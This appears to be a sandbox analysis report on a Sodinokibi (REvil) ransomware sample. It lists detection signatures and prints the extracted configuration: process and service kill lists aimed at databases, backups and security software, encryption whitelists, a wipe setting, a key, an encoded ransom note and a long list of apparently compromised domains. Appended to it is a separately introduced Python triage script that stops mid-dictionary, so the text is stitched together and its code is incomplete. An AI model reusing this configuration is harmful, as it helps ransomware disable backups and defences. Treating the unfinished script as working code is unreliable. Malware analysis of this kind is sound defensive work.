
Analysis Report Sample_5fba9b06c7da400016eb6275.exe

Overview

General Information

Sample Name:Sample_5fba9b06c7da400016eb6275.exe
Analysis ID:326335
MD5:0e285f30f30dedd812295d2408f4b84c
SHA1:24e8a7a0b9fdf929e6cc4b52b0470bf4f7b6f244
SHA256:d91f951bdcf35012ac6b47c28cf32ec143e4269243d8c229f6cb326fd343df95


Detection

Sodinokibi
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Found ransom note / readme
Multi AV Scanner detection for submitted file
Yara detected Sodinokibi Ransomware
Contains functionality to detect sleep reduction / modifications
Found Tor onion address
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • unsecapp.exe (PID: 5772 cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding MD5: 9CBD3EC8D9E4F8CE54258B0573C66BEB)
  • cleanup

Malware Configuration

Threatname: Sodinokibi

{"prc": ["firefox", "oracle", "visio", "xfssvccon", "steam", "winword", "mspub", "isqlplussvc", "ocssd", "ocautoupds", "mydesktopqos", "outlook", "dbeng50", "sql", "agntsvc", "tbirdconfig", "encsvc", "thebat", "synctime", "onenote", "mydesktopservice", "thunderbird", "excel", "powerpnt", "dbsnmp", "sqbcoreservice", "ocomm", "infopath", "wordpad", "msaccess"], "sub": "5891", "svc": ["veeam", "vss", "backup", "sophos", "svc$", "mepocs", "memtas", "sql"], "wht": {"ext": ["msc", "mpa", "hta", "ani", "themepack", "com", "ps1", "icl", "dll", "ldf", "ocx", "lnk", "theme", "nls", "386", "cmd", "wpx", "diagcfg", "cur", "prf", "ico", "nomedia", "sys", "bat", "exe", "deskthemepack", "spl", "shs", "hlp", "rtp", "msp", "scr", "ics", "key", "msstyles", "mod", "cab", "diagcab", "adv", "rom", "drv", "bin", "msi", "idx", "cpl", "diagpkg", "msu", "icns", "lock"], "fls": ["boot.ini", "bootsect.bak", "bootfont.bin", "ntuser.ini", "iconcache.db", "ntuser.dat.log", "desktop.ini", "autorun.inf", "thumbs.db", "ntuser.dat", "ntldr"], "fld": ["system volume information", "program files (x86)", "mozilla", "application data", "windows.old", "msocache", "appdata", "$recycle.bin", "$windows.~ws", "program files", "windows", "programdata", "google", "tor browser", "perflogs", "boot", "intel", "$windows.~bt"]}, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": 
"notmissingout.com;employeesurveys.com;delchacay.com.ar;sw1m.ru;sofavietxinh.com;samnewbyjax.com;pawsuppetlovers.com;panelsandwichmadrid.es;frontierweldingllc.com;antenanavi.com;nokesvilledentistry.com;partnertaxi.sk;tomaso.gr;levihotelspa.fi;myhealth.net.au;midmohandyman.com;kirkepartner.dk;zewatchers.com;lapmangfpt.info.vn;purposeadvisorsolutions.com;fitnessbazaar.com;brigitte-erler.com;lescomtesdemean.be;supportsumba.nl;deltacleta.cat;mastertechusering.com;dontpassthepepper.com;apprendrelaudit.com;whittier5k.com;ladelirante.fr;mariposapropaneaz.com;nsec.se;shsthepapercut.com;adoptioperheet.fi;labobit.it;retroearthstudio.com;ahouseforlease.com;greenfieldoptimaldentalcare.com;renergysolution.com;xtptrack.com;sandd.nl;euro-trend.pl;christ-michael.net;bigasgrup.com;plv.media;wacochamber.com;jyzdesign.com;facettenreich27.de;echtveilig.nl;mbxvii.com;igfap.com;noskierrenteria.com;strategicstatements.com;itelagen.com;burkert-ideenreich.de;cleliaekiko.online;baronloan.org;slwgs.org;wolf-glas-und-kunst.de;hardinggroup.com;mousepad-direkt.de;4youbeautysalon.com;suncrestcabinets.ca;zzyjtsgls.com;commercialboatbuilding.com;stemenstilte.nl;maasreusel.nl;bloggyboulga.net;vitavia.lt;skanah.com;autodujos.lt;leoben.at;filmstreamingvfcomplet.be;mediaplayertest.net;travelffeine.com;ungsvenskarna.se;securityfmm.com;rushhourappliances.com;ziegler-praezisionsteile.de;drinkseed.com;live-your-life.jp;deko4you.at;comarenterprises.com;despedidascostablanca.es;lebellevue.fr;schraven.de;daklesa.de;musictreehouse.net;imadarchid.com;karacaoglu.nl;oneheartwarriors.at;cheminpsy.fr;dr-seleznev.com;ilcdover.com;baptisttabernacle.com;malychanieruchomoscipremium.com;tennisclubetten.nl;bigbaguettes.eu;pcprofessor.com;pcp-nc.com;berliner-versicherungsvergleich.de;bouldercafe-wuppertal.de;rafaut.com;c-a.co.in;modamilyon.com;financescorecard.com;darnallwellbeing.org.uk;houseofplus.com;urist-bogatyr.ru;parkcf.nl;maratonaclubedeportugal.com;launchhubl.com;anteniti.com;mirjamholleman.nl;faizanullah.com;gan
tungankunciakrilikbandung.com;blgr.be;sachnendoc.com;smejump.co.th;minipara.com;lefumetdesdombes.com;arteservicefabbro.com;thee.network;walter-lemm.de;adultgamezone.com;dubscollective.com;tongdaifpthaiphong.net;todocaracoles.com;girlillamarketing.com;abl1.net;pinkexcel.com;smartypractice.com;ravensnesthomegoods.com;unim.su;deepsouthclothingcompany.com;leather-factory.co.jp;romeguidedvisit.com;leeuwardenstudentcity.nl;mymoneyforex.com;levdittliv.se;vihannesporssi.fi;bildungsunderlebnis.haus;abogados-en-alicante.es;nurturingwisdom.com;naturalrapids.com;micahkoleoso.de;tux-espacios.com;manifestinglab.com;effortlesspromo.com;boosthybrid.com.au;huesges-gruppe.de;kikedeoliveira.com;simpkinsedwards.co.uk;synlab.lt;expandet.dk;acomprarseguidores.com;yourobgyn.net;kariokids.com;x-ray.ca;serce.info.pl;run4study.com;seagatesthreecharters.com;dr-tremel-rednitzhembach.de;kath-kirche-gera.de;peterstrobos.com;liikelataamo.fi;littlebird.salon;kevinjodea.com;morawe-krueger.de;ilive.lt;iwelt.de;ai-spt.jp;gemeentehetkompas.nl;foryourhealth.live;koken-voor-baby.nl;d2marketing.co.uk;seproc.hn;porno-gringo.com;geoffreymeuli.com;camsadviser.com;garage-lecompte-rouen.fr;mdacares.com;andersongilmour.co.uk;havecamerawilltravel2017.wordpress.com;kedak.de;uranus.nl;tandartspraktijkheesch.nl;kojima-shihou.com;pomodori-pizzeria.de;advizewealth.com;blog.solutionsarchitect.guru;nandistribution.nl;desert-trails.com;celeclub.org;bouncingbonanza.com;toponlinecasinosuk.co.uk;revezlimage.com;modestmanagement.com;stoeferlehalle.de;pointos.com;wurmpower.at;marcuswhitten.site;1team.es;abitur-undwieweiter.de;hihaho.com;brawnmediany.com;coding-marking.com;paradicepacks.com;ymca-cw.org.uk;mdk-mediadesign.de;latestmodsapks.com;danskretursystem.dk;highimpactoutdoors.net;waynela.com;ki-lowroermond.nl;puertamatic.es;tulsawaterheaterinstallation.com;aarvorg.com;visiativ-industry.fr;systemate.dk;calxplus.eu;profectis.de;dsl-ip.de;fax-payday-loans.com;otsu-bon.com;iviaggisonciliegie.it;ontrailsandboulevards.com;spa
cecitysisters.org;odiclinic.org;zweerscreatives.nl;entopic.com;alysonhoward.com;8449nohate.org;sporthamper.com;schmalhorst.de;hvccfloorcare.com;danubecloud.com;gastsicht.de;corendonhotels.com;solinegraphic.com;kissit.ca;thewellnessmimi.com;presseclub-magdeburg.de;marietteaernoudts.nl;ncid.bc.ca;myhostcloud.com;commonground-stories.com;darrenkeslerministries.com;forskolorna.org;personalenhancementcenter.com;drinkseed.com;olejack.ru;projetlyonturin.fr;webcodingstudio.com;antonmack.de;ausbeverage.com.au;marketingsulweb.com;xltyu.com;syndikat-asphaltfieber.de;jsfg.com;ikads.org;i-arslan.de;figura.team;themadbotter.com;international-sound-awards.com;rebeccarisher.com;nicoleaeschbachorg.wordpress.com;parkstreetauto.net;helenekowalsky.com;bristolaeroclub.co.uk;csgospeltips.se;rerekatu.com;blood-sports.net;spsshomeworkhelp.com;plotlinecreative.com;hhcourier.com;birnam-wood.com;zflas.com;love30-chanko.com;sportverein-tambach.de;funjose.org.gt;oncarrot.com;cursoporcelanatoliquido.online;yamalevents.com;bimnapratica.com;schlafsack-test.net;jenniferandersonwriter.com;id-et-d.fr;satyayoga.de;ecopro-kanto.com;xn--fnsterputssollentuna-39b.se;vyhino-zhulebino-24.ru;spectrmash.ru;maineemploymentlawyerblog.com;cnoia.org;turkcaparbariatrics.com;zimmerei-fl.de;nijaplay.com;montrium.com;lecantou-coworking.com;fitnessingbyjessica.com;copystar.co.uk;igrealestate.com;groupe-frayssinet.fr;creamery201.com;mrtour.site;jusibe.com;mank.de;sportsmassoren.com;austinlchurch.com;dekkinngay.com;35-40konkatsu.net;stacyloeb.com;hkr-reise.de;diversiapsicologia.es;norovirus-ratgeber.de;mercantedifiori.com;kmbshipping.co.uk;brevitempore.net;psnacademy.in;2ekeus.nl;praxis-foerderdiagnostik.de;devstyle.org;tanzschule-kieber.de;layrshift.eu;homng.net;insigniapmg.com;mapawood.com;zenderthelender.com;smogathon.com;dramagickcom.wordpress.com;tanciu.com;clos-galant.com;connectedace.com;wasmachtmeinfonds.at;tips.technology;atozdistribution.co.uk;thefixhut.com;harpershologram.wordpress.com;kafu.ch;bodyfulls.com;d
aniel-akermann-architektur-und-planung.ch;123vrachi.ru;lange.host;kingfamily.construction;petnest.ir;rota-installations.co.uk;caffeinternet.it;brandl-blumen.de;ralister.co.uk;oceanastudios.com;hugoversichert.de;xn--rumung-bua.online;cityorchardhtx.com;extensionmaison.info;real-estate-experts.com;wmiadmin.com;abogadoengijon.es;verytycs.com;southeasternacademyofprosthodontics.org;jbbjw.com;bxdf.info;pt-arnold.de;xn--singlebrsen-vergleich-nec.com;mir-na-iznanku.com;mindpackstudios.com;linnankellari.fi;web.ion.ag;stupbratt.no;aurum-juweliere.de;roadwarrior.app;crowd-patch.co.uk;jadwalbolanet.info;dlc.berlin;wari.com.pe;fairfriends18.de;femxarxa.cat;thedad.com;bhwlawfirm.com;muamuadolls.com;resortmtn.com;sexandfessenjoon.wordpress.com;tanzprojekt.com;epwritescom.wordpress.com;div-vertriebsforschung.de;hypozentrum.com;www1.proresult.no;drnice.de;ecpmedia.vn;aco-media.nl;lusak.at;chavesdoareeiro.com;zonamovie21.net;tinyagency.com;parking.netgateway.eu;miraclediet.fun;oldschoolfun.net;smhydro.com.pl;mirkoreisser.de;starsarecircular.org;modelmaking.nl;corelifenutrition.com;raschlosser.de;greenko.pl;kaotikkustomz.com;paulisdogshop.de;craigvalentineacademy.com;catholicmusicfest.com;sarbatkhalsafoundation.org;mikeramirezcpa.com;eglectonk.online;simulatebrain.com;allamatberedare.se;lascuola.nl;zso-mannheim.de;kindersitze-vergleich.de;baumkuchenexpo.jp;vermoote.de;freie-gewerkschaften.de;cactusthebrand.com;iwelt.de;1kbk.com.ua;mytechnoway.com;polzine.net;xn--thucmctc-13a1357egba.com;krcove-zily.eu;bodyforwife.com;sauschneider.info;woodworkersolution.com;admos-gleitlager.de;stingraybeach.com;body-guards.it;hotelzentral.at;compliancesolutionsstrategies.com;gopackapp.com;dutchbrewingcoffee.com;intecwi.com;nvwoodwerks.com;reddysbakery.com;directwindowco.com;liveottelut.com;citymax-cr.com;waveneyrivercentre.co.uk;kunze-immobilien.de;yousay.site;rocketccw.com;troegs.com;jiloc.com;friendsandbrgrs.com;castillobalduz.es;basisschooldezonnewijzer.nl;hrabritelefon.hr;calabasasdigest.com;fatf
reezingmachines.com;berlin-bamboo-bikes.org;controldekk.com;xlarge.at;conexa4papers.trade;yassir.pro;bierensgebakkramen.nl;asiluxury.com;conasmanagement.de;joyeriaorindia.com;tetinfo.in;the-domain-trader.com;servicegsm.net;firstpaymentservices.com;gasolspecialisten.se;jvanvlietdichter.nl;takeflat.com;freie-baugutachterpraxis.de;huissier-creteil.com;scenepublique.net;atmos-show.com;interactcenter.org;lloydconstruction.com;bestbet.com;hotelsolbh.com.br;healthyyworkout.com;hoteledenpadova.it;bockamp.com;quizzingbee.com;thedresserie.com;plastidip.com.ar;devlaur.com;kojinsaisei.info;zervicethai.co.th;newyou.at;myzk.site;siluet-decor.ru;sabel-bf.com;poultrypartners.nl;boisehosting.net;socstrp.org;actecfoundation.org;offroadbeasts.com;aunexis.ch;stormwall.se;nativeformulas.com;jolly-events.com;luckypatcher-apkz.com;centromarysalud.com;mylovelybluesky.com;cranleighscoutgroup.org;radaradvies.nl;fotoscondron.com;sloverse.com;theshungiteexperience.com.au;onlyresultsmarketing.com;bowengroup.com.au;artallnightdc.com;space.ua;gratispresent.se;sevenadvertising.com;bingonearme.org;carrybrands.nl;12starhd.online;transliminaltribe.wordpress.com;tigsltd.com;esope-formation.fr;global-kids.info;xoabigail.com;milestoneshows.com;balticdentists.com;pogypneu.sk;elimchan.com;vloeren-nu.nl;pmcimpact.com;westdeptfordbuyrite.com;charlesreger.com;narcert.com;argos.wityu.fund;outcomeisincome.com;appsformacpc.com;importardechina.info;alten-mebel63.ru;thailandholic.com;ra-staudte.de;henricekupper.com;twohourswithlena.wordpress.com;nachhilfe-unterricht.com;koko-nora.dk;dinslips.se;longislandelderlaw.com;digivod.de;woodleyacademy.org;knowledgemuseumbd.com;hairnetty.wordpress.com;memaag.com;richard-felix.co.uk;edv-live.de;kamahouse.net;truenyc.co;fizzl.ru;shiresresidential.com;proudground.org;carriagehousesalonvt.com;fibrofolliculoma.info;drugdevice.org;kaliber.co.jp;sagadc.com;collaborativeclassroom.org;mmgdouai.fr;quickyfunds.com;waermetauscher-berechnen.de;asgestion.com;praxis-management-plus.de;i-
trust.dk;sobreholanda.com;phantastyk.com;beaconhealthsystem.org;moveonnews.com;spargel-kochen.de;portoesdofarrobo.com;nataschawessels.com;jorgobe.at;dubnew.com;art2gointerieurprojecten.nl;glennroberts.co.nz;licor43.de;hellohope.com;coastalbridgeadvisors.com;seevilla-dr-sturm.at;kenhnoithatgo.com;talentwunder.com;flexicloud.hk;lubetkinmediacompanies.com;promesapuertorico.com;anybookreader.de;operaslovakia.sk;krlosdavid.com;slupetzky.at;argenblogs.com.ar;remcakram.com;gadgetedges.com;vannesteconstruct.be;iwelt.de;humanityplus.org;patrickfoundation.net;lykkeliv.net;hexcreatives.co;punchbaby.com;socialonemedia.com;vickiegrayimages.com;greenpark.ch;alvinschwartz.wordpress.com;danholzmann.com;pelorus.group;rksbusiness.com;dw-css.de;theclubms.com;rieed.de;antiaginghealthbenefits.com;baylegacy.com;autodemontagenijmegen.nl;boompinoy.com;cite4me.org;pickanose.com;meusharklinithome.wordpress.com;huehnerauge-entfernen.de;summitmarketingstrategies.com;perbudget.com;gmto.fr;physiofischer.de;chefdays.de;roygolden.com;vorotauu.ru;agence-chocolat-noir.com;ulyssemarketing.com;tophumanservicescourses.com;vibehouse.rw;airconditioning-waalwijk.nl;carolinepenn.com;sweering.fr;igorbarbosa.com;marchand-sloboda.com;hairstylesnow.site;creative-waves.co.uk;thaysa.com;kostenlose-webcams.com;spylista.com;amylendscrestview.com;allfortheloveofyou.com;kaminscy.com;deprobatehelp.com;ditog.fr;rostoncastings.co.uk;naturstein-hotte.de;backstreetpub.com;celularity.com;tonelektro.nl;caribbeansunpoker.com;merzi.info;solhaug.tk;mirjamholleman.nl;whyinterestingly.ru;htchorst.nl;restaurantesszimmer.de;devok.info;consultaractadenacimiento.com;innote.fi;senson.fi;cwsitservices.co.uk;tandartspraktijkhartjegroningen.nl;mbfagency.com;thomasvicino.com;filmvideoweb.com;michaelsmeriglioracing.com;artotelamsterdam.com;pubweb.carnet.hr;philippedebroca.com;lynsayshepherd.co.uk;all-turtles.com;hokagestore.com;eadsmurraypugh.com;theletter.company;pridoxmaterieel.nl;buroludo.nl;trapiantofue.it;christinarebuffetcourses.co
m;ilso.net;selfoutlet.com;chaotrang.com;jameskibbie.com;alhashem.net;insidegarage.pl;the-virtualizer.com;fotoideaymedia.es;craigmccabe.fun;saxtec.com;opatrovanie-ako.sk;lbcframingelectrical.com;testzandbakmetmening.online;cuspdental.com;rosavalamedahr.com;behavioralmedicinespecialists.com;joseconstela.com;helikoptervluchtnewyork.nl;coursio.com;hashkasolutindo.com;baustb.de;parebrise-tla.fr;ouryoungminds.wordpress.com;dutchcoder.nl;bundabergeyeclinic.com.au;smart-light.co.uk;simpliza.com;ceid.info.tr;4net.guru;americafirstcommittee.org;ncs-graphic-studio.com;myteamgenius.com;ianaswanson.com;lightair.com;planchaavapor.net;crosspointefellowship.church;maxadams.london;humancondition.com;rimborsobancario.net;navyfederalautooverseas.com;jasonbaileystudio.com;new.devon.gov.uk;theadventureedge.com;tecnojobsnet.com;globedivers.wordpress.com;mezhdu-delom.ru;pivoineetc.fr;quemargrasa.net;xn--logopdie-leverkusen-kwb.de;dareckleyministries.com;gporf.fr;judithjansen.com;augenta.com;stoneys.ch;accountancywijchen.nl;better.town;smalltownideamill.wordpress.com;amerikansktgodis.se;gasbarre.com;architecturalfiberglass.org;kao.at;asteriag.com;evergreen-fishing.com;notsilentmd.org;kamienny-dywan24.pl;ussmontanacommittee.us;mountsoul.de;lachofikschiet.nl;xn--vrftet-pua.biz;heidelbergartstudio.gallery;waywithwords.net;galleryartfair.com;stopilhan.com;victoriousfestival.co.uk;instatron.net;chandlerpd.com;blacksirius.de;surespark.org.uk;almosthomedogrescue.dog;bafuncs.org;fannmedias.com;penco.ie;people-biz.com;lukeshepley.wordpress.com;pferdebiester.de;d1franchise.com;mepavex.nl;happyeasterimages.org;ecoledansemulhouse.fr;exenberger.at;slimani.net;imperfectstore.com;oslomf.no;schmalhorst.de;smithmediastrategies.com;nacktfalter.de;hatech.io;klusbeter.nl;videomarketing.pro;madinblack.com;mediaacademy-iraq.org;destinationclients.fr;torgbodenbollnas.se;farhaani.com;boulderwelt-muenchen-west.de;nosuchthingasgovernment.com;wellplast.se;harveybp.com;psa-sec.de;schoolofpassivewealth.com;transportes
ycementoshidalgo.es;jerling.de;craftleathermnl.com;bsaship.com;wychowanieprzedszkolne.pl;abogadosadomicilio.es;streamerzradio1.site;pv-design.de;johnsonfamilyfarmblog.wordpress.com;delawarecorporatelaw.com;herbayupro.com;irishmachineryauctions.com;macabaneaupaysflechois.com;milsing.hr;pasivect.co.uk;walkingdeadnj.com;sportiomsportfondsen.nl;durganews.com;oemands.dk;maureenbreezedancetheater.org;otto-bollmann.de;lillegrandpalais.com;dirittosanitario.biz;naturavetal.hr;monark.com;theapifactory.com;sairaku.net;marathonerpaolo.com;abogadosaccidentetraficosevilla.es;ogdenvision.com;thenewrejuveme.com;mooshine.com;dr-pipi.de;stallbyggen.se;handi-jack-llc.com;babcockchurch.org;jacquin-maquettes.com;shonacox.com;siliconbeach-realestate.com;qlog.de;blumenhof-wegleitner.at;katketytaanet.fi;worldhealthbasicinfo.com;trackyourconstruction.com;centrospgolega.com;centuryrs.com;bayoga.co.uk;theduke.de;solerluethi-allart.ch;strandcampingdoonbeg.com;caribdoctor.org;liliesandbeauties.org;cortec-neuro.com;kadesignandbuild.co.uk;advokathuset.dk;bouquet-de-roses.com;noesis.tech;denifl-consulting.at;vanswigchemdesign.com;uimaan.fi;dpo-as-a-service.com;iqbalscientific.com;tomoiyuma.com;sahalstore.com;sotsioloogia.ee;nmiec.com;zimmerei-deboer.de;katiekerr.co.uk;nuzech.com;corona-handles.com;crowcanyon.com;bbsmobler.se;allure-cosmetics.at;jobcenterkenya.com;edgewoodestates.org;id-vet.com;steampluscarpetandfloors.com;microcirc.net;ostheimer.at;colorofhorses.com;eco-southafrica.com;hebkft.hu;bookspeopleplaces.com;ino-professional.ru;alfa-stroy72.com;mank.de;cafemattmeera.com;associationanalytics.com;edrcreditservices.nl;dezatec.es;blewback.com;allentownpapershow.com;bastutunnan.se;comparatif-lave-linge.fr;mirjamholleman.nl;bogdanpeptine.ro;kosterra.com;tsklogistik.eu;erstatningsadvokaterne.dk;chrissieperry.com;wraithco.com;idemblogs.com;homesdollar.com;completeweddingkansas.com;gymnasedumanagement.com;executiveairllc.com;haar-spange.com;mrxermon.de;skiltogprint.no;candyhouseusa.com;aprepol.com
;eaglemeetstiger.de;sanyue119.com;kuntokeskusrok.fi;charlottepoudroux-photographie.fr;classycurtainsltd.co.uk;denovofoodsgroup.com;kidbucketlist.com.au;stoeberstuuv.de;faronics.com;atalent.fi;mrsfieldskc.com;fensterbau-ziegler.de;ruralarcoiris.com;heliomotion.com;besttechie.com;321play.com.hk;apolomarcas.com;biapi-coaching.fr;sojamindbody.com;pocket-opera.de;bradynursery.com;loprus.pl;plantag.de;thomas-hospital.de;ftf.or.at;insp.bi;groupe-cets.com;tarotdeseidel.com;c2e-poitiers.com;tenacitytenfold.com;pay4essays.net;rehabilitationcentersinhouston.net;shiftinspiration.com;gaiam.nl;jobmap.at;buymedical.biz;bargningavesta.se;aakritpatel.com;lucidinvestbank.com;nakupunafoundation.org;dushka.ua;fayrecreations.com;alsace-first.com;answerstest.ru;lmtprovisions.com;bordercollie-nim.nl;foretprivee.ca;norpol-yachting.com;naswrrg.org;slashdb.com;webhostingsrbija.rs;evologic-technologies.com;polychromelabs.com;precisionbevel.com;hannah-fink.de;prochain-voyage.net;milltimber.aberdeen.sch.uk;mylolis.com;DupontSellsHomes.com;tampaallen.com;piajeppesen.dk;kampotpepper.gives;limassoldriving.com;finde-deine-marke.de;danielblum.info;cirugiauretra.es;dnepr-beskid.com.ua;101gowrie.com;officehymy.com;courteney-cox.net;vetapharma.fr;lichencafe.com;broseller.com;fiscalsort.com;rhinosfootballacademy.com;campus2day.de;mooreslawngarden.com;sipstroysochi.ru;crediacces.com;platformier.com;ampisolabergeggi.it;justinvieira.com;spd-ehningen.de;anthonystreetrimming.com;micro-automation.de;pier40forall.org;agence-referencement-naturel-geneve.net;forestlakeuca.org.au;coding-machine.com;imaginado.de;falcou.fr;ateliergamila.com;homecomingstudio.com;elpa.se;vitalyscenter.es;bricotienda.com;aniblinova.wordpress.com;ihr-news.jp;aminaboutique247.com;xn--fn-kka.no;veybachcenter.de;ccpbroadband.com;geisterradler.de;urmasiimariiuniri.ro;easytrans.com.au;pasvenska.se;lapinvihreat.fi;lionware.de;botanicinnovations.com;leda-ukraine.com.ua;tradiematepro.com.au;vdberg-autoimport.nl;neuschelectrical.co.za;seminoc.c
om;vibethink.net;iyahayki.nl;grelot-home.com;iphoneszervizbudapest.hu;y-archive.com;sla-paris.com;parks-nuernberg.de;newstap.com.ng;jakekozmor.com;tinkoff-mobayl.ru;ledmes.ru;teresianmedia.org;rozemondcoaching.nl;bigler-hrconsulting.ch;irinaverwer.com;wien-mitte.co.at;symphonyenvironmental.com;body-armour.online;lenreactiv-shop.ru;aodaichandung.com;educar.org;seitzdruck.com;eraorastudio.com;iyengaryogacharlotte.com;triactis.com;vesinhnha.com.vn;osterberg.fi;cuppacap.com;ausair.com.au;cursosgratuitosnainternet.com;aglend.com.au;izzi360.com;miriamgrimm.de;readberserk.com;abuelos.com;analiticapublica.es;corola.es;psc.de;architekturbuero-wagner.net;coffreo.biz;stampagrafica.es;sanaia.com;manutouchmassage.com;tastewilliamsburg.com;braffinjurylawfirm.com;spinheal.ru;deoudedorpskernnoordwijk.nl;klimt2012.info;galserwis.pl;pixelarttees.com;testcoreprohealthuk.com;edelman.jp;unetica.fr;hiddencitysecrets.com.au;grupocarvalhoerodrigues.com.br;qualitus.com;smessier.com;sinal.org;familypark40.com;degroenetunnel.com;croftprecision.co.uk;jeanlouissibomana.com;teknoz.net;embracinghiscall.com;evangelische-pfarrgemeinde-tuniberg.de;shhealthlaw.com;ivivo.es;faroairporttransfers.net;werkkring.nl;villa-marrakesch.de;nestor-swiss.ch;associacioesportivapolitg.cat;makeitcount.at;fransespiegels.nl;work2live.de;beyondmarcomdotcom.wordpress.com;drfoyle.com;promalaga.es;upmrkt.co;herbstfeststaefa.ch;ligiercenter-sachsen.de;pierrehale.com;artige.com;digi-talents.com;cimanchesterescorts.co.uk;stemplusacademy.com;ctrler.cn;ceres.org.au;oneplusresource.org;toreria.es;bptdmaluku.com;ftlc.es;mooglee.com;finediningweek.pl;mountaintoptinyhomes.com;rumahminangberdaya.com;autopfand24.de;boldcitydowntown.com;triggi.de;mrsplans.net;tuuliautio.fi;geekwork.pl;songunceliptv.com;simoneblum.de;jandaonline.com;sterlingessay.com;bargningharnosand.se;smokeysstoves.com;fundaciongregal.org;markelbroch.com;saka.gr;juneauopioidworkgroup.org;assurancesalextrespaille.fr;schoellhammer.com;verifort-capital.de;first-2-aid
-u.com;zieglerbrothers.de;vietlawconsultancy.com;rollingrockcolumbia.com;lapinlviasennus.fi;campusoutreach.org;corelifenutrition.com;mardenherefordshire-pc.gov.uk;enovos.de;makeurvoiceheard.com;pmc-services.de;onlybacklink.com;365questions.org;nancy-informatique.fr;hmsdanmark.dk;maryloutaylor.com;ncuccr.org;wsoil.com.sg;julis-lsa.de;carlosja.com;bee4win.com;live-con-arte.de;aselbermachen.com;ivfminiua.com;webmaster-peloton.com;blogdecachorros.com;softsproductkey.com;latribuessentielle.com;biortaggivaldelsa.com;chatizel-paysage.fr;vancouver-print.ca;bridgeloanslenders.com;simplyblessedbykeepingitreal.com;autofolierung-lu.de;cerebralforce.net;higadograsoweb.com;cyntox.com;smale-opticiens.nl;gonzalezfornes.es;upplandsspar.se;slimidealherbal.com;verbisonline.com;kalkulator-oszczednosci.pl;teczowadolina.bytom.pl;shadebarandgrillorlando.com;paymybill.guru;gamesboard.info;ora-it.de;dublikator.com;lorenacarnero.com;tstaffing.nl;datacenters-in-europe.com;luxurytv.jp;binder-buerotechnik.at;vox-surveys.com;team-montage.dk;polymedia.dk;highlinesouthasc.com;nhadatcanho247.com;n1-headache.com;trystana.com;bunburyfreightservices.com.au;makeflowers.ru;urclan.net;icpcnj.org;milanonotai.it;refluxreducer.com;bauertree.com;blossombeyond50.com;kisplanning.com.au;em-gmbh.ch;saarland-thermen-resort.com;haremnick.com;ohidesign.com;stefanpasch.me;deschl.net;beautychance.se;manijaipur.com;withahmed.com;balticdermatology.lt;heurigen-bauer.at;logopaedie-blomberg.de;trulynolen.co.uk;ventti.com.ar;iwelt.de;extraordinaryoutdoors.com;goodgirlrecovery.com;winrace.no;qualitaetstag.de;noixdecocom.fr;schutting-info.nl;mediaclan.info;hushavefritid.dk;no-plans.com;iwr.nl;gw2guilds.org;fitovitaforum.com;podsosnami.ru;journeybacktolife.com;you-bysia.com.au", "dbg": false, "pid": "$2a$10$hIPnYTfL4yAd01j./DIPs.Tdwq.QURm2fbUM4pQFInKQ45tak6xW6", "nbody": "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", "et": 0, "wipe": true, "wfld": ["backup"], "rdmcnt": 0, "nname": "{EXT}-readme.txt", "pk": 
"PcGaG/OPoFiNzu1LUC2Qhz905YYQChX9SFo+MuXEV2M=", "net": false, "exp": false, "arn": false}

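A short triage script for the configuration above, added here as an example; it is not code from the report, from Joe Security, or from the malware. It embeds an excerpt of the page's own config (lists shortened, the "dmn" list cut to a few constructed entries that include one of the page's repeated hosts, "nbody" omitted), decodes the "img" field, builds a de-duplicated domain list, and models the whitelist, process-kill and service-stop checks. The matching semantics (case-insensitive substring match for "prc"/"svc", whole path components for "wht.fld", whitelist checked before the "wfld" wipe rule) are assumptions drawn from the field names and the signature list, not the binary's actual logic.

```python
"""Triage helpers for the REvil/Sodinokibi configuration extracted on this page.

Added example, not part of the sandbox report. CONFIG is an excerpt of the
page's configuration; matching rules below are modelled on the field names.
"""
import base64
import ntpath

CONFIG = {
    # "prc": process image names to terminate (excerpt of the page's list)
    "prc": ["firefox", "oracle", "visio", "winword", "outlook", "sql",
            "excel", "powerpnt", "thunderbird", "onenote"],
    "sub": "5891",
    # "svc": services to stop/delete (full list from the page)
    "svc": ["veeam", "vss", "backup", "sophos", "svc$", "mepocs", "memtas", "sql"],
    # "wht": whitelist of extensions, file names and folder names (excerpts)
    "wht": {
        "ext": ["msc", "com", "ps1", "dll", "lnk", "cmd", "sys", "bat", "exe",
                "scr", "msi", "cpl", "lock"],
        "fls": ["boot.ini", "bootsect.bak", "ntuser.ini", "desktop.ini",
                "autorun.inf", "thumbs.db", "ntuser.dat", "ntldr"],
        "fld": ["system volume information", "program files (x86)", "mozilla",
                "windows.old", "appdata", "$recycle.bin", "program files",
                "windows", "programdata", "google", "tor browser", "boot"],
    },
    # "img": exactly as on the page
    "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA",
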